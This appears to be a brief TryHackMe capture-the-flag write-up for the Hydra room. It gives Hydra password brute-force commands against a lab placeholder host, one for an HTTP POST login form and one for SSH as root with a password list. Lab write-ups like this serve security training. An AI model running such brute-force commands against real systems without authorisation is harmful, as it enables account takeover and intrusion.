THM - Hydra

Flag 01: For brute-force web password we must know which type of request it is making. GET or POST methods are commonly used and then by follwing we use the commands sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"

login page
got the flag.

Flag 02: For brute-force SSH we run hydra -l root -P passwords.txt MACHINE_IP -t 4 ssh command.

password founded. Now login
got the flag.

Copyright © 2026 Mahidul Haque. This post is licensed under a CC BY-NC-ND 4.0 license. You may read, learn, and share links to this post for non‑commercial, educational purposes, as long as you give appropriate attribution. You may not copy, reproduce, adapt, distribute, or use this work commercially without explicit permission.